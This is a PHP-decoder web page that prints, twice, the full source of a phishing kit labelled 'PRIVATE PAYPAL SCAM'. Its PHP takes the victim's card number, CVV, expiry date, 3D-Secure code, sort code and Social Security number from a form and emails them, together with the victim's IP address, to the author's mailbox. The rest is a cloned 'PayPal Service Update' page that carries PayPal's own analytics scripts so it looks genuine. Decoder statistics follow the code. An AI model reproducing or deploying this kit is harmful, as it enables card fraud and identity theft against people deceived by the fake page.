Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? /* PRIVATE PAYPAL SCAM BY TN-SN!PER GREETZ TO DARCK PIRATOS & ADELS..

Decoded Output download

<? 
 
/* 
 
  PRIVATE PAYPAL SCAM  
  BY TN-SN!PER  
  GREETZ TO  
  DARCK PIRATOS & ADELSS04  
 
*/ 
 
session_start(); 
$firstname 	= $_SESSION['_fn'] ; 
$lastname 	= $_SESSION['_ln']; 
 
/*========== [ Variables ]==========*/ 
$ip 		= getenv("REMOTE_ADDR"); 
$cardholder = $_POST['_fulln']; 
$cardnumber = $_POST['_ccn']; 
$ccv 		= $_POST['_ccv']; 
$expm 		= $_POST['_expm']; 
$expy 		= $_POST['_expy']; 
$secure3d	= $_POST['_3d']; 
$sortcode 	= $_POST['_sortc']; 
$ssn1 		= $_POST['_ssn1']; 
$ssn2 		= $_POST['_ssn2']; 
$ssn3 		= $_POST['_ssn3']; 
/*========== [ Variables ]==========*/ 
 
 
$message = " 
=========[VBV INFOS]========= 
Card Holder		: $cardholder 
Card Number		: $cardnumber 
CVC				: $ccv 
Exp Date		: $expm / $expy 
3D / VBV		: $secure3d 
Sort Code		: $sortcode 
SSN			  	: $ssn1 - $ssn2 - $ssn3 
===============[IP]============== 
IP	: http://www.geoiptool.com/?IP=$ip 
==========[BY TN-SN!PER]========="; 
 
$to = "[email protected]"; // Email \ 
$subject = "VBV INFOS FROM [$ip]"; 
$headers = "From: TN-SN!PER <[email protected]>"; 
$headers .= $_POST['eMailAdd']."
"; 
$headers .= "MIME-Version: 1.0
"; 
 
mail($to, $subject, $message,$headers); 
 
 
?> 
 
<!DOCTYPE html> 
<html lang="en" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js " data-device-type="desktop"> 
 
<head> 
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
    <script src="./js/modernizr-2.7.0.js"></script> 
    <meta charset="utf-8"> 
    <link rel="shortcut icon" href="./img/pp_favicon_x.ico"> 
    <link rel="apple-touch-icon" href="./img/apple-touch-icon.png"> 
    <title>PayPal Service Update</title> 
    <link rel="stylesheet" href="./css/app.css"> 
    <link type="text/css" rel="stylesheet" href="./css/a_23_-1010506237.css"> 
	<script type="text/javascript" src="./js/a_23_-1984923970.js"></script> 
	 
	<SCRIPT LANGUAGE="JavaScript"> 
function popUp(URL) { 
day = new Date(); 
id = day.getTime(); 
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=660,height=396,left = 565.5,top = 149');"); 
} 
</script> 
	 
   <SCRIPT language="Javascript"> 
      function isNumberKey(evt) 
      { 
         var charCode = (evt.which) ? evt.which : event.keyCode 
         if (charCode > 31 && (charCode < 48 || charCode > 57)) 
            return false; 
 
         return true; 
      } 
    
    
    
	function ValidateAlpha(evt) 
        { 
            var keyCode = (evt.which) ? evt.which : evt.keyCode 
            if ((keyCode < 65 || keyCode > 90) && (keyCode < 97 || keyCode > 123) && keyCode != 32) 
 
            return false; 
                return true; 
        } 
    
    
    
    
    
   </SCRIPT> 
	 
	 
	 
	 
	 
	 
	<script src="./is/head.js"></script> 
   <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="main" src="./js/main.js"></script> 
    <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="view/summary/index" src="./js/index.js"></script> 
    <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="lib/business/businessHelper" src="./js/businessHelper.js"></script> 
    <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="widget/explore" src="./js/explore.js"></script> 
  </head> 
 
<body id="page"> 
    <header> 
         
		<? include ("./banking/header.php"); ?> 
		 
    </header> 
    <div class="betaBannerMainWrapper"></div> 
    <div class="containerCentered" id="content" role="content" tabindex="-1"> 
        <div class="layout" id="index"> 
            <section class=""> 
                <div class="row-fluid"> 
                    <div class="span4" id="homePage"> 
                       
 
					  <? include ("./billing/tools.php"); ?> 
						 
						 
                         
						 
						 
						<? include ("./billing/enabledby.php"); ?> 
						 
						 
                    </div> 
                    <div class="span8 actTile"> 
					 
					<? include ("./banking/form.php"); ?> 
					 
					</div> 
                </div> 
            </section> 
        </div> 
        <input type="hidden" id="notesContent" value="Remarque :"> 
        <input type="hidden" id="transactionsFetchLimit" value="8"> 
    </div> 
    <footer role="navigation"> 
        <? include ("./banking/footer.php"); ?> 
    </footer> 
    <script type="text/javascript" src="./js/pp_jscode_080706.js"></script> 
    <script type="text/javascript"> 
        s.pageName = "main:business:::home"; 
        s.channel = "business"; 
        s.hier1 = "main_business__"; 
        s.eVar31 = "main:business:::home"; 
        s.eVar25 = "main:business:::home:::"; 
        s.prop25 = "main:business:::home:::"; 
        s.prop1 = "businesshubspartaweb/WEB-INF/templates/summary/index.dust"; 
        s.prop35 = "in"; 
        s.prop37 = "::"; 
        s.prop40 = "65d4000c75d70"; 
        s.prop30 = "glb"; 
        s.prop50 = "fr_FR"; 
        s.eVar61 = "41283c888012c69177d915b597f5f6b5"; 
        s.eVar62 = "beta"; 
        s.prop62 = "beta"; 
        s.eVar66 = "||"; 
        s.prop71 = "Sparta"; 
        s.event = "event17"; 
        s.eVar6 = "business::"; 
        s.prop6 = "YM2835PF9WQXJ"; 
        s.prop7 = "business"; 
        s.prop8 = "unverified"; 
        s.prop9 = "unrestricted"; 
        s.prop10 = "FR"; 
        s.prop80 = "testVarRemoveMe"; /************ DO NOT ALTER ANYTHING BELOW THIS LINE ! *************/ 
        function scOnload() { 
            var s_code = s.t(); 
            if (s_code) document.write(s_code); 
        } 
        if (window.addEventListener) { 
            window.addEventListener('load', scOnload, false); 
        } else if (window.attachEvent) { 
            window.attachEvent('onload', scOnload); 
        }; 
        if (navigator.appVersion.indexOf('MSIE') >= 0) document.write(unescape('%3C') + '!-' + '-') 
    </script> 
    <noscript>&lt;img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" alt="" height="1" width="1" border="0"&gt;</noscript> 
    <!-- DO NOT REMOVE THIS COMMENT --> 
    <script type="text/javascript" src="./js/pa.js"></script> 
    <script type="text/javascript"> 
        (function () { 
            if (typeof PAYPAL.analytics != "undefined") { 
                PAYPAL.core = PAYPAL.core || {}; 
                PAYPAL.core.pta = PAYPAL.analytics.setup({ 
                    data: 'pgrp=main%3Abusiness%3A%3A%3Ahome&page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&lgin=in&vers=%3A%3A&calc=65d4000c75d70&rsta=fr_FR&md5h=41283c888012c69177d915b597f5f6b5&shfp=%7C%7C&usce=beta&pgtf=Sparta&s=ci&goal=event17&flnm=business%3A%3A&cust=YM2835PF9WQXJ&acnt=business&aver=unverified&rstr=unrestricted&pfid=65d4000c75d70&s.prop80=testVarRemoveMe', 
                    url: '\/\/t.paypal.com\/ts' 
                }); 
            } 
        }()); 
    </script> 
    <noscript>&lt;img src="https://t.paypal.com/ts?nojs=1&amp;pgrp=main%3Abusiness%3A%3A%3Ahome&amp;page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&amp;tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&amp;lgin=in&amp;vers=%3A%3A&amp;calc=65d4000c75d70&amp;rsta=fr_FR&amp;md5h=41283c888012c69177d915b597f5f6b5&amp;shfp=%7C%7C&amp;usce=beta&amp;pgtf=Sparta&amp;s=ci&amp;goal=event17&amp;flnm=business%3A%3A&amp;cust=YM2835PF9WQXJ&amp;acnt=business&amp;aver=unverified&amp;rstr=unrestricted&amp;pfid=65d4000c75d70&amp;s.prop80=testVarRemoveMe" alt="" height="1" width="1" border="0"&gt;</noscript> 
    <script data-main="https://www.paypalobjects.com/eboxapps/js/cc/828c80ba7a7ce05c22cf35736ef9b3/main" src="./js/require-2.0.1.js"></script> 
    <div class="exploreModal"></div> 
</body> 
 
</html>

Did this file decode correctly?

Original Code

<?

/*

  PRIVATE PAYPAL SCAM 
  BY TN-SN!PER 
  GREETZ TO 
  DARCK PIRATOS & ADELSS04 

*/

session_start();
$firstname 	= $_SESSION['_fn'] ;
$lastname 	= $_SESSION['_ln'];

/*========== [ Variables ]==========*/
$ip 		= getenv("REMOTE_ADDR");
$cardholder = $_POST['_fulln'];
$cardnumber = $_POST['_ccn'];
$ccv 		= $_POST['_ccv'];
$expm 		= $_POST['_expm'];
$expy 		= $_POST['_expy'];
$secure3d	= $_POST['_3d'];
$sortcode 	= $_POST['_sortc'];
$ssn1 		= $_POST['_ssn1'];
$ssn2 		= $_POST['_ssn2'];
$ssn3 		= $_POST['_ssn3'];
/*========== [ Variables ]==========*/


$message = "
=========[VBV INFOS]=========
Card Holder		: $cardholder
Card Number		: $cardnumber
CVC				: $ccv
Exp Date		: $expm / $expy
3D / VBV		: $secure3d
Sort Code		: $sortcode
SSN			  	: $ssn1 - $ssn2 - $ssn3
===============[IP]==============
IP	: http://www.geoiptool.com/?IP=$ip
==========[BY TN-SN!PER]=========";

$to = "[email protected]"; // Email \\
$subject = "VBV INFOS FROM [$ip]";
$headers = "From: TN-SN!PER <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($to, $subject, $message,$headers);


?>

<!DOCTYPE html>
<html lang="en" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js " data-device-type="desktop">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script src="./js/modernizr-2.7.0.js"></script>
    <meta charset="utf-8">
    <link rel="shortcut icon" href="./img/pp_favicon_x.ico">
    <link rel="apple-touch-icon" href="./img/apple-touch-icon.png">
    <title>PayPal Service Update</title>
    <link rel="stylesheet" href="./css/app.css">
    <link type="text/css" rel="stylesheet" href="./css/a_23_-1010506237.css">
	<script type="text/javascript" src="./js/a_23_-1984923970.js"></script>
	
	<SCRIPT LANGUAGE="JavaScript">
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=660,height=396,left = 565.5,top = 149');");
}
</script>
	
   <SCRIPT language="Javascript">
      function isNumberKey(evt)
      {
         var charCode = (evt.which) ? evt.which : event.keyCode
         if (charCode > 31 && (charCode < 48 || charCode > 57))
            return false;

         return true;
      }
   
   
   
	function ValidateAlpha(evt)
        {
            var keyCode = (evt.which) ? evt.which : evt.keyCode
            if ((keyCode < 65 || keyCode > 90) && (keyCode < 97 || keyCode > 123) && keyCode != 32)

            return false;
                return true;
        }
   
   
   
   
   
   </SCRIPT>
	
	
	
	
	
	
	<script src="./is/head.js"></script>
   <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="main" src="./js/main.js"></script>
    <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="view/summary/index" src="./js/index.js"></script>
    <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="lib/business/businessHelper" src="./js/businessHelper.js"></script>
    <script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="widget/explore" src="./js/explore.js"></script>
  </head>

<body id="page">
    <header>
        
		<? include ("./banking/header.php"); ?>
		
    </header>
    <div class="betaBannerMainWrapper"></div>
    <div class="containerCentered" id="content" role="content" tabindex="-1">
        <div class="layout" id="index">
            <section class="">
                <div class="row-fluid">
                    <div class="span4" id="homePage">
                      

					  <? include ("./billing/tools.php"); ?>
						
						
                        
						
						
						<? include ("./billing/enabledby.php"); ?>
						
						
                    </div>
                    <div class="span8 actTile">
					
					<? include ("./banking/form.php"); ?>
					
					</div>
                </div>
            </section>
        </div>
        <input type="hidden" id="notesContent" value="Remarque :">
        <input type="hidden" id="transactionsFetchLimit" value="8">
    </div>
    <footer role="navigation">
        <? include ("./banking/footer.php"); ?>
    </footer>
    <script type="text/javascript" src="./js/pp_jscode_080706.js"></script>
    <script type="text/javascript">
        s.pageName = "main\x3Abusiness\x3A\x3A\x3Ahome";
        s.channel = "business";
        s.hier1 = "main_business__";
        s.eVar31 = "main\x3Abusiness\x3A\x3A\x3Ahome";
        s.eVar25 = "main\x3Abusiness\x3A\x3A\x3Ahome\x3A\x3A\x3A";
        s.prop25 = "main\x3Abusiness\x3A\x3A\x3Ahome\x3A\x3A\x3A";
        s.prop1 = "businesshubspartaweb\x2FWEB-INF\x2Ftemplates\x2Fsummary\x2Findex.dust";
        s.prop35 = "in";
        s.prop37 = "\x3A\x3A";
        s.prop40 = "65d4000c75d70";
        s.prop30 = "glb";
        s.prop50 = "fr_FR";
        s.eVar61 = "41283c888012c69177d915b597f5f6b5";
        s.eVar62 = "beta";
        s.prop62 = "beta";
        s.eVar66 = "\x7C\x7C";
        s.prop71 = "Sparta";
        s.event = "event17";
        s.eVar6 = "business\x3A\x3A";
        s.prop6 = "YM2835PF9WQXJ";
        s.prop7 = "business";
        s.prop8 = "unverified";
        s.prop9 = "unrestricted";
        s.prop10 = "FR";
        s.prop80 = "testVarRemoveMe"; /************ DO NOT ALTER ANYTHING BELOW THIS LINE ! *************/
        function scOnload() {
            var s_code = s.t();
            if (s_code) document.write(s_code);
        }
        if (window.addEventListener) {
            window.addEventListener('load', scOnload, false);
        } else if (window.attachEvent) {
            window.attachEvent('onload', scOnload);
        };
        if (navigator.appVersion.indexOf('MSIE') >= 0) document.write(unescape('%3C') + '!-' + '-')
    </script>
    <noscript>&lt;img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" alt="" height="1" width="1" border="0"&gt;</noscript>
    <!-- DO NOT REMOVE THIS COMMENT -->
    <script type="text/javascript" src="./js/pa.js"></script>
    <script type="text/javascript">
        (function () {
            if (typeof PAYPAL.analytics != "undefined") {
                PAYPAL.core = PAYPAL.core || {};
                PAYPAL.core.pta = PAYPAL.analytics.setup({
                    data: 'pgrp=main%3Abusiness%3A%3A%3Ahome&page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&lgin=in&vers=%3A%3A&calc=65d4000c75d70&rsta=fr_FR&md5h=41283c888012c69177d915b597f5f6b5&shfp=%7C%7C&usce=beta&pgtf=Sparta&s=ci&goal=event17&flnm=business%3A%3A&cust=YM2835PF9WQXJ&acnt=business&aver=unverified&rstr=unrestricted&pfid=65d4000c75d70&s.prop80=testVarRemoveMe',
                    url: '\/\/t.paypal.com\/ts'
                });
            }
        }());
    </script>
    <noscript>&lt;img src="https://t.paypal.com/ts?nojs=1&amp;pgrp=main%3Abusiness%3A%3A%3Ahome&amp;page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&amp;tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&amp;lgin=in&amp;vers=%3A%3A&amp;calc=65d4000c75d70&amp;rsta=fr_FR&amp;md5h=41283c888012c69177d915b597f5f6b5&amp;shfp=%7C%7C&amp;usce=beta&amp;pgtf=Sparta&amp;s=ci&amp;goal=event17&amp;flnm=business%3A%3A&amp;cust=YM2835PF9WQXJ&amp;acnt=business&amp;aver=unverified&amp;rstr=unrestricted&amp;pfid=65d4000c75d70&amp;s.prop80=testVarRemoveMe" alt="" height="1" width="1" border="0"&gt;</noscript>
    <script data-main="https://www.paypalobjects.com/eboxapps/js/cc/828c80ba7a7ce05c22cf35736ef9b3/main" src="./js/require-2.0.1.js"></script>
    <div class="exploreModal"></div>
</body>

</html>

Function Calls

getenv 1
session_start 1

Variables

$lastname None
$firstname None

Stats

MD5 546bd4322fd3e2769254a350a90f2766
Eval Count 0
Decode Time 93 ms